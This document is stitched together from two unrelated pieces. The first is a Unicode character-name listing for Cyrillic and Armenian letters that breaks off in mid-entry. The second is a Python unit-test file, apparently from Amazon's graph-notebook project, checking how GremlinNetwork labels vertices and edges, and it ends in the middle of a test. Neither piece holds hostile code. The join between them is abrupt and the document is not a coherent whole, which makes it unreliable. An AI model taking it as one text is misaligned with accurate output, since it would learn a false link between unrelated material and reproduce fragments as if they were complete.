0497 CYRILLIC SMALL LETTER ZHE WITH DESCENDER
0498 CYRILLIC CAPITAL LETTER ZE WITH DESCENDER
0499 CYRILLIC SMALL LETTER ZE WITH DESCENDER
049A CYRILLIC CAPITAL LETTER KA WITH DESCENDER
049B CYRILLIC SMALL LETTER KA WITH DESCENDER
049C CYRILLIC CAPITAL LETTER KA WITH VERTICAL STROKE
049D CYRILLIC SMALL LETTER KA WITH VERTICAL STROKE
049E CYRILLIC CAPITAL LETTER KA WITH STROKE
049F CYRILLIC SMALL LETTER KA WITH STROKE
04A0 CYRILLIC CAPITAL LETTER BASHKIR KA
04A1 CYRILLIC SMALL LETTER BASHKIR KA
04A2 CYRILLIC CAPITAL LETTER EN WITH DESCENDER
04A3 CYRILLIC SMALL LETTER EN WITH DESCENDER
04A4 CYRILLIC CAPITAL LIGATURE EN GHE
04A5 CYRILLIC SMALL LIGATURE EN GHE
04A6 CYRILLIC CAPITAL LETTER PE WITH MIDDLE HOOK
04A7 CYRILLIC SMALL LETTER PE WITH MIDDLE HOOK
04A8 CYRILLIC CAPITAL LETTER ABKHASIAN HA
04A9 CYRILLIC SMALL LETTER ABKHASIAN HA
04AA CYRILLIC CAPITAL LETTER ES WITH DESCENDER
04AB CYRILLIC SMALL LETTER ES WITH DESCENDER
04AC CYRILLIC CAPITAL LETTER TE WITH DESCENDER
04AD CYRILLIC SMALL LETTER TE WITH DESCENDER
04AE CYRILLIC CAPITAL LETTER STRAIGHT U
04AF CYRILLIC SMALL LETTER STRAIGHT U
04B0 CYRILLIC CAPITAL LETTER STRAIGHT U WITH STROKE
04B1 CYRILLIC SMALL LETTER STRAIGHT U WITH STROKE
04B2 CYRILLIC CAPITAL LETTER HA WITH DESCENDER
04B3 CYRILLIC SMALL LETTER HA WITH DESCENDER
04B4 CYRILLIC CAPITAL LIGATURE TE TSE
04B5 CYRILLIC SMALL LIGATURE TE TSE
04B6 CYRILLIC CAPITAL LETTER CHE WITH DESCENDER
04B7 CYRILLIC SMALL LETTER CHE WITH DESCENDER
04B8 CYRILLIC CAPITAL LETTER CHE WITH VERTICAL STROKE
04B9 CYRILLIC SMALL LETTER CHE WITH VERTICAL STROKE
04BA CYRILLIC CAPITAL LETTER SHHA
04BB CYRILLIC SMALL LETTER SHHA
04BC CYRILLIC CAPITAL LETTER ABKHASIAN CHE
04BD CYRILLIC SMALL LETTER ABKHASIAN CHE
04BE CYRILLIC CAPITAL LETTER ABKHASIAN CHE WITH DESCENDER
04BF CYRILLIC SMALL LETTER ABKHASIAN CHE WITH DESCENDER
04C0 CYRILLIC LETTER PALOCHKA
04C1 CYRILLIC CAPITAL LETTER ZHE WITH BREVE
04C2 CYRILLIC SMALL LETTER ZHE WITH BREVE
04C3 CYRILLIC CAPITAL LETTER KA WITH HOOK
04C4 CYRILLIC SMALL LETTER KA WITH HOOK
04C5 CYRILLIC CAPITAL LETTER EL WITH TAIL
04C6 CYRILLIC SMALL LETTER EL WITH TAIL
04C7 CYRILLIC CAPITAL LETTER EN WITH HOOK
04C8 CYRILLIC SMALL LETTER EN WITH HOOK
04C9 CYRILLIC CAPITAL LETTER EN WITH TAIL
04CA CYRILLIC SMALL LETTER EN WITH TAIL
04CB CYRILLIC CAPITAL LETTER KHAKASSIAN CHE
04CC CYRILLIC SMALL LETTER KHAKASSIAN CHE
04CD CYRILLIC CAPITAL LETTER EM WITH TAIL
04CE CYRILLIC SMALL LETTER EM WITH TAIL
04CF CYRILLIC SMALL LETTER PALOCHKA
04D0 CYRILLIC CAPITAL LETTER A WITH BREVE
04D1 CYRILLIC SMALL LETTER A WITH BREVE
04D2 CYRILLIC CAPITAL LETTER A WITH DIAERESIS
04D3 CYRILLIC SMALL LETTER A WITH DIAERESIS
04D4 CYRILLIC CAPITAL LIGATURE A IE
04D5 CYRILLIC SMALL LIGATURE A IE
04D6 CYRILLIC CAPITAL LETTER IE WITH BREVE
04D7 CYRILLIC SMALL LETTER IE WITH BREVE
04D8 CYRILLIC CAPITAL LETTER SCHWA
04D9 CYRILLIC SMALL LETTER SCHWA
04DA CYRILLIC CAPITAL LETTER SCHWA WITH DIAERESIS
04DB CYRILLIC SMALL LETTER SCHWA WITH DIAERESIS
04DC CYRILLIC CAPITAL LETTER ZHE WITH DIAERESIS
04DD CYRILLIC SMALL LETTER ZHE WITH DIAERESIS
04DE CYRILLIC CAPITAL LETTER ZE WITH DIAERESIS
04DF CYRILLIC SMALL LETTER ZE WITH DIAERESIS
04E0 CYRILLIC CAPITAL LETTER ABKHASIAN DZE
04E1 CYRILLIC SMALL LETTER ABKHASIAN DZE
04E2 CYRILLIC CAPITAL LETTER I WITH MACRON
04E3 CYRILLIC SMALL LETTER I WITH MACRON
04E4 CYRILLIC CAPITAL LETTER I WITH DIAERESIS
04E5 CYRILLIC SMALL LETTER I WITH DIAERESIS
04E6 CYRILLIC CAPITAL LETTER O WITH DIAERESIS
04E7 CYRILLIC SMALL LETTER O WITH DIAERESIS
04E8 CYRILLIC CAPITAL LETTER BARRED O
04E9 CYRILLIC SMALL LETTER BARRED O
04EA CYRILLIC CAPITAL LETTER BARRED O WITH DIAERESIS
04EB CYRILLIC SMALL LETTER BARRED O WITH DIAERESIS
04EC CYRILLIC CAPITAL LETTER E WITH DIAERESIS
04ED CYRILLIC SMALL LETTER E WITH DIAERESIS
04EE CYRILLIC CAPITAL LETTER U WITH MACRON
04EF CYRILLIC SMALL LETTER U WITH MACRON
04F0 CYRILLIC CAPITAL LETTER U WITH DIAERESIS
04F1 CYRILLIC SMALL LETTER U WITH DIAERESIS
04F2 CYRILLIC CAPITAL LETTER U WITH DOUBLE ACUTE
04F3 CYRILLIC SMALL LETTER U WITH DOUBLE ACUTE
04F4 CYRILLIC CAPITAL LETTER CHE WITH DIAERESIS
04F5 CYRILLIC SMALL LETTER CHE WITH DIAERESIS
04F6 CYRILLIC CAPITAL LETTER GHE WITH DESCENDER
04F7 CYRILLIC SMALL LETTER GHE WITH DESCENDER
04F8 CYRILLIC CAPITAL LETTER YERU WITH DIAERESIS
04F9 CYRILLIC SMALL LETTER YERU WITH DIAERESIS
04FA CYRILLIC CAPITAL LETTER GHE WITH STROKE AND HOOK
04FB CYRILLIC SMALL LETTER GHE WITH STROKE AND HOOK
04FC CYRILLIC CAPITAL LETTER HA WITH HOOK
04FD CYRILLIC SMALL LETTER HA WITH HOOK
04FE CYRILLIC CAPITAL LETTER HA WITH STROKE
04FF CYRILLIC SMALL LETTER HA WITH STROKE
0500 CYRILLIC CAPITAL LETTER KOMI DE
0501 CYRILLIC SMALL LETTER KOMI DE
0502 CYRILLIC CAPITAL LETTER KOMI DJE
0503 CYRILLIC SMALL LETTER KOMI DJE
0504 CYRILLIC CAPITAL LETTER KOMI ZJE
0505 CYRILLIC SMALL LETTER KOMI ZJE
0506 CYRILLIC CAPITAL LETTER KOMI DZJE
0507 CYRILLIC SMALL LETTER KOMI DZJE
0508 CYRILLIC CAPITAL LETTER KOMI LJE
0509 CYRILLIC SMALL LETTER KOMI LJE
050A CYRILLIC CAPITAL LETTER KOMI NJE
050B CYRILLIC SMALL LETTER KOMI NJE
050C CYRILLIC CAPITAL LETTER KOMI SJE
050D CYRILLIC SMALL LETTER KOMI SJE
050E CYRILLIC CAPITAL LETTER KOMI TJE
050F CYRILLIC SMALL LETTER KOMI TJE
0510 CYRILLIC CAPITAL LETTER REVERSED ZE
0511 CYRILLIC SMALL LETTER REVERSED ZE
0512 CYRILLIC CAPITAL LETTER EL WITH HOOK
0513 CYRILLIC SMALL LETTER EL WITH HOOK
0514 CYRILLIC CAPITAL LETTER LHA
0515 CYRILLIC SMALL LETTER LHA
0516 CYRILLIC CAPITAL LETTER RHA
0517 CYRILLIC SMALL LETTER RHA
0518 CYRILLIC CAPITAL LETTER YAE
0519 CYRILLIC SMALL LETTER YAE
051A CYRILLIC CAPITAL LETTER QA
051B CYRILLIC SMALL LETTER QA
051C CYRILLIC CAPITAL LETTER WE
051D CYRILLIC SMALL LETTER WE
051E CYRILLIC CAPITAL LETTER ALEUT KA
051F CYRILLIC SMALL LETTER ALEUT KA
0520 CYRILLIC CAPITAL LETTER EL WITH MIDDLE HOOK
0521 CYRILLIC SMALL LETTER EL WITH MIDDLE HOOK
0522 CYRILLIC CAPITAL LETTER EN WITH MIDDLE HOOK
0523 CYRILLIC SMALL LETTER EN WITH MIDDLE HOOK
0524 CYRILLIC CAPITAL LETTER PE WITH DESCENDER
0525 CYRILLIC SMALL LETTER PE WITH DESCENDER
0531 ARMENIAN CAPITAL LETTER AYB
0532 ARMENIAN CAPITAL LETTER BEN
0533 ARMENIAN CAPITAL LETTER GIM
0534 ARMENIAN CAPITAL LETTER DA
0535 ARMENIAN CAPITAL LETTER ECH
0536 ARMENIAN CAPITAL LETTER ZA
0537 ARMENIAN CAPITAL LETTER EH
0538 ARMENIAN CAPITAL LETTER ET
0539 ARMENIAN CAPITAL LETTER TO
053A ARMENIAN CAPITAL LETTER ZHE
053B ARMENIAN CAPITAL LETTER INI
053C ARMENIAN CAPITAL LETTER LIWN
053D ARMENIAN CAPITAL LETTER XEH
053E ARMENIAN CAPITAL LETTER CA
053F ARMENIAN CAPITAL LETTER KEN
0540 ARMENIAN CAPITAL LETTER HO
0541 ARMENIAN CAPITAL LETTER JA
0542 ARMENIAN CAPITAL LETTER GHAD
0543 ARMENIAN CAPITAL LETTER CHEH
0544 ARMENIAN CAPITAL LETTER MEN
0545 ARMENIAN CAPITAL LETTER YI
0546 ARMENIAN CAPITAL LETTER NOW
0547 ARMENIAN CAPITAL LETTER SHA
0548 ARMENIAN CAPITAL LETTER VO
0549 ARMENIAN CAPITAL LETTER CHA
054A ARMENIAN CAPITAL LETTER PEH
054B ARMENIAN CAPITAL LETTER JHEH
054C ARMENIAN CAPITAL LETTER RA
054D ARMENIAN CAPITAL LETTER SEH
054E ARMENIAN CAPITAL LETTER VEW
054F ARMENIAN CAPITAL LETTER TIWN
0550 ARMENIAN CAPITAL LETTER REH
0551 ARMENIAN CAPITAL LETTER CO
0552 ARMENIAN CAPITAL LETTER YIWN
0553 ARMENIAN CAPITAL LETTER PIWR
0554 ARMENIAN CAPITAL LETTER KEH
0555 ARMENIAN CAPITAL LETTER OH
0556 ARMENIAN CAPITAL LETTER FEH
0559 ARMENIAN MODIFIER LETTER LEFT HALF RING
055A ARMENIAN APOSTROPHE
055B ARMENIAN EMPHASIS MARK
055C ARMENIAN EXCLAMATION MARK
055D ARMENIAN COMMA
055E ARMENIAN QUESTION MARK
055F ARMENIAN ABBREVIATION MARK
0561 ARMENIAN SMALL LETTER AYB
0562 ARMENIAN SMALL LETTER BEN
0563 ARMENIAN SMALL LETTER GIM
0564 ARMENIAN SMALL LETTER DA
0565 ARMENIAN SMALL LETTER ECH
0566 ARMENIAN SMALL LETTER ZA
0567 ARMENIAN SMALL LETTER EH
0568 ARMENIAN SMALL LETTER ET
0569 ARMENIAN SMALL LETTER TO
056A ARMENIAN SMALL LETTER ZHE
056B ARMENIAN SMALL LETTER INI
056C ARMENIAN SMALL LETTER LIWN
056D ARMENIAN SMALL LETTER XEH
056E ARMENIAN SMALL LETTER CA
056F ARMENIAN SMALL LETTER KEN
0570 ARMENIAN SMALL LETTER HO
0571 ARMENIAN SMALL LETTER JA
0572 ARMENIAN SMALL LETTER GHAD
0573 ARMENIAN SMALL LETTER CHEH
0574 ARMENIAN SMALL LETTER MEN
0575 ARMENIAN SMALL LETTER YI
0576 ARMENIAN SMALL LETTER NOW
0577 ARMENIAN SMALL LETTER SHA
0578 ARMENIAN SMALL LETTER VO
0579 ARMENIAN SMALL LETTER CHA
057A ARMENIAN SMALL LETTER PEH
057B ARMENIAN | |
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
"""
import unittest
from gremlin_python.structure.graph import Path, Edge, Vertex
from gremlin_python.process.traversal import T
from graph_notebook.network.EventfulNetwork import EVENT_ADD_NODE
from graph_notebook.network.gremlin.GremlinNetwork import GremlinNetwork
class TestGremlinNetwork(unittest.TestCase):
def test_add_vertex_with_callback(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
reached_callback = {}
expected_data = {
'data': {
'group': 'airport',
'label': 'airport',
'properties': {
T.id: '1234',
T.label: 'airport',
'code': 'SEA',
'runways': '4',
'type': 'Airport'},
'title': 'airport'},
'node_id': '1234'}
def add_node_callback(network, event_name, data):
self.assertEqual(event_name, EVENT_ADD_NODE)
self.assertEqual(expected_data, data)
reached_callback[event_name] = True
gn = GremlinNetwork(callbacks={EVENT_ADD_NODE: [add_node_callback]})
gn.add_vertex(vertex)
self.assertTrue(reached_callback[EVENT_ADD_NODE])
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(expected_data['data']['properties'], node['properties'])
def test_add_explicit_type_vertex_without_node_property(self):
vertex = Vertex(id='1')
gn = GremlinNetwork()
gn.add_vertex(vertex)
node = gn.graph.nodes.get('1')
self.assertEqual(node['label'], 'vertex')
def test_add_explicit_type_vertex_with_invalid_node_property_label(self):
vertex = Vertex(id='1')
gn = GremlinNetwork(display_property='foo')
gn.add_vertex(vertex)
node = gn.graph.nodes.get('1')
self.assertEqual(node['label'], 'vertex')
def test_add_explicit_type_vertex_with_node_property_label(self):
vertex = Vertex(id='1')
gn = GremlinNetwork(display_property='label')
gn.add_vertex(vertex)
node = gn.graph.nodes.get('1')
self.assertEqual(node['label'], 'vertex')
def test_add_explicit_type_vertex_with_node_property_id(self):
vertex = Vertex(id='1')
gn = GremlinNetwork(display_property='id')
gn.add_vertex(vertex)
node = gn.graph.nodes.get('1')
self.assertEqual(node['label'], '1')
def test_add_explicit_type_vertex_with_node_property_json(self):
vertex1 = Vertex(id='1')
gn = GremlinNetwork(display_property='{"vertex":"id"}')
gn.add_vertex(vertex1)
node1 = gn.graph.nodes.get('1')
self.assertEqual(node1['label'], '1')
def test_add_explicit_type_vertex_with_node_property_json_invalid_json(self):
vertex1 = Vertex(id='1')
gn = GremlinNetwork(display_property='{"vertex":id}')
gn.add_vertex(vertex1)
node1 = gn.graph.nodes.get('1')
self.assertEqual(node1['label'], 'vertex')
def test_add_explicit_type_vertex_with_node_property_json_invalid_key(self):
vertex1 = Vertex(id='1')
gn = GremlinNetwork(display_property='{"foo":"id"}')
gn.add_vertex(vertex1)
node1 = gn.graph.nodes.get('1')
self.assertEqual(node1['label'], 'vertex')
def test_add_explicit_type_vertex_with_node_property_json_invalid_value(self):
vertex1 = Vertex(id='1')
gn = GremlinNetwork(display_property='{"vertex":"code"}')
gn.add_vertex(vertex1)
node1 = gn.graph.nodes.get('1')
self.assertEqual(node1['label'], 'vertex')
def test_add_explicit_type_multiple_vertex_with_node_property_string(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
gn = GremlinNetwork(display_property='id')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
node1 = gn.graph.nodes.get('1')
node2 = gn.graph.nodes.get('2')
self.assertEqual(node1['label'], '1')
self.assertEqual(node2['label'], '2')
def test_add_explicit_type_multiple_vertex_with_node_property_json(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
gn = GremlinNetwork(display_property='{"vertex":"id"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
node1 = gn.graph.nodes.get('1')
node2 = gn.graph.nodes.get('2')
self.assertEqual(node1['label'], '1')
self.assertEqual(node2['label'], '2')
def test_add_vertex_without_node_property(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork()
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'airport')
def test_add_vertex_with_node_property_string(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='code')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'SEA')
def test_add_vertex_with_node_property_string_invalid(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='desc')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'airport')
def test_add_vertex_with_node_property_json(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='{"airport":"code"}')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'SEA')
def test_add_vertex_with_node_property_json_invalid_json(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='{"airport":code}')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'airport')
def test_add_vertex_with_node_property_json_invalid_key(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='{"country":"code"}')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'airport')
def test_add_vertex_with_node_property_json_invalid_value(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(display_property='{"airport":"desc"}')
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'airport')
def test_add_vertex_multiple_with_node_property_string(self):
vertex1 = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
vertex2 = {
T.id: '2345',
T.label: 'country',
'type': 'Country',
'continent': 'NA',
'code': 'USA'
}
gn = GremlinNetwork(display_property='code')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
node1 = gn.graph.nodes.get(vertex1[T.id])
node2 = gn.graph.nodes.get(vertex2[T.id])
self.assertEqual(node1['label'], 'SEA')
self.assertEqual(node2['label'], 'USA')
def test_add_vertex_multiple_with_multiple_node_properties(self):
vertex1 = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
vertex2 = {
T.id: '2345',
T.label: 'country',
'type': 'Country',
'continent': 'NA',
'code': 'USA'
}
gn = GremlinNetwork(display_property='{"airport":"code","country":"continent"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
node1 = gn.graph.nodes.get(vertex1[T.id])
node2 = gn.graph.nodes.get(vertex2[T.id])
self.assertEqual(node1['label'], 'SEA')
self.assertEqual(node2['label'], 'NA')
def test_add_vertex_with_label_length(self):
vertex = {
T.id: '1234',
T.label: 'Seattle-Tacoma International Airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(label_max_length=15)
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'Seattle-Taco...')
def test_add_vertex_with_bracketed_label_and_label_length(self):
vertex = {
T.id: '1234',
T.label: "['Seattle-Tacoma International Airport']",
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(label_max_length=15)
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'Seattle-Taco...')
def test_add_vertex_with_label_length_less_than_3(self):
vertex = {
T.id: '1234',
T.label: 'Seattle-Tacoma International Airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA'
}
gn = GremlinNetwork(label_max_length=-50)
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], '...')
def test_add_vertex_with_node_property_string_and_label_length(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA',
'desc': 'Seattle-Tacoma International Airport'
}
gn = GremlinNetwork(display_property='{"airport":"desc"}', label_max_length=15)
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'Seattle-Taco...')
def test_add_vertex_with_node_property_json_and_label_length(self):
vertex = {
T.id: '1234',
T.label: 'airport',
'type': 'Airport',
'runways': '4',
'code': 'SEA',
'desc': 'Seattle-Tacoma International Airport'
}
gn = GremlinNetwork(display_property='desc', label_max_length=15)
gn.add_vertex(vertex)
node = gn.graph.nodes.get(vertex[T.id])
self.assertEqual(node['label'], 'Seattle-Taco...')
def test_add_explicit_type_single_edge_without_edge_property(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork()
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_single_edge_with_invalid_edge_property(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='length')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_single_edge_with_edge_property_string_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='label')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_single_edge_with_edge_property_string_id(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='id')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], '1')
def test_add_explicit_type_single_edge_with_edge_property_json_single_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='{"route":"inV"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'v[2]')
def test_add_explicit_type_single_edge_with_edge_property_malformed_json_single_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='{"route":inV}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_single_edge_with_edge_property_json_invalid_key_single_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='{"road":"inV"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_single_edge_with_edge_property_json_invalid_value_single_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
gn = GremlinNetwork(edge_display_property='{"route":"distance"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_explicit_type_multiple_edges_with_edge_property_string(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
vertex3 = Vertex(id='3')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='airway')
edge2 = Edge(id='2', outV=vertex2, inV=vertex3, label='road')
gn = GremlinNetwork(edge_display_property='id')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
gn.add_path_edge(edge2)
edge_route = gn.graph.get_edge_data('1', '2')
edge_path = gn.graph.get_edge_data('2', '3')
self.assertEqual(edge_route['1']['label'], '1')
self.assertEqual(edge_path['2']['label'], '2')
def test_add_explicit_type_multiple_edges_with_edge_property_json_single_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
vertex3 = Vertex(id='3')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='route')
edge2 = Edge(id='2', outV=vertex2, inV=vertex3, label='route')
gn = GremlinNetwork(edge_display_property='{"route":"inV"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
gn.add_path_edge(edge2)
edge_route = gn.graph.get_edge_data('1', '2')
edge_path = gn.graph.get_edge_data('2', '3')
self.assertEqual(edge_route['1']['label'], 'v[2]')
self.assertEqual(edge_path['2']['label'], 'v[3]')
def test_add_explicit_type_multiple_edges_with_edge_property_json_multiple_labels(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
vertex3 = Vertex(id='3')
edge1 = Edge(id='1', outV=vertex1, inV=vertex2, label='airway')
edge2 = Edge(id='2', outV=vertex2, inV=vertex3, label='road')
gn = GremlinNetwork(edge_display_property='{"airway":"inV","road":"id"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1)
gn.add_path_edge(edge2)
edge_route = gn.graph.get_edge_data('1', '2')
edge_path = gn.graph.get_edge_data('2', '3')
self.assertEqual(edge_route['1']['label'], 'v[2]')
self.assertEqual(edge_path['2']['label'], '2')
def test_add_single_edge_without_edge_property(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork()
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_single_edge_with_invalid_edge_property(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='distance')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_single_edge_with_edge_property_string_label(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='T.label')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_single_edge_with_edge_property_string_id(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='T.id')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], '1')
def test_add_single_edge_with_edge_property_json(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='{"route":"inV"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'v[2]')
def test_add_single_edge_with_edge_property_invalid_json(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='{"route":inV}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_single_edge_with_edge_property_json_invalid_key(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='{"distance":"inV"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_single_edge_with_edge_property_json_invalid_value(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
edge1 = {T.id: '1', T.label: 'route', 'outV': 'v[1]', 'inV': 'v[2]'}
gn = GremlinNetwork(edge_display_property='{"route":"foo"}')
gn.add_vertex(vertex1)
gn.add_vertex(vertex2)
gn.add_path_edge(edge1, from_id='1', to_id='2')
edge = gn.graph.get_edge_data('1', '2')
self.assertEqual(edge['1']['label'], 'route')
def test_add_multiple_edges_with_edge_property_string(self):
vertex1 = Vertex(id='1')
vertex2 = Vertex(id='2')
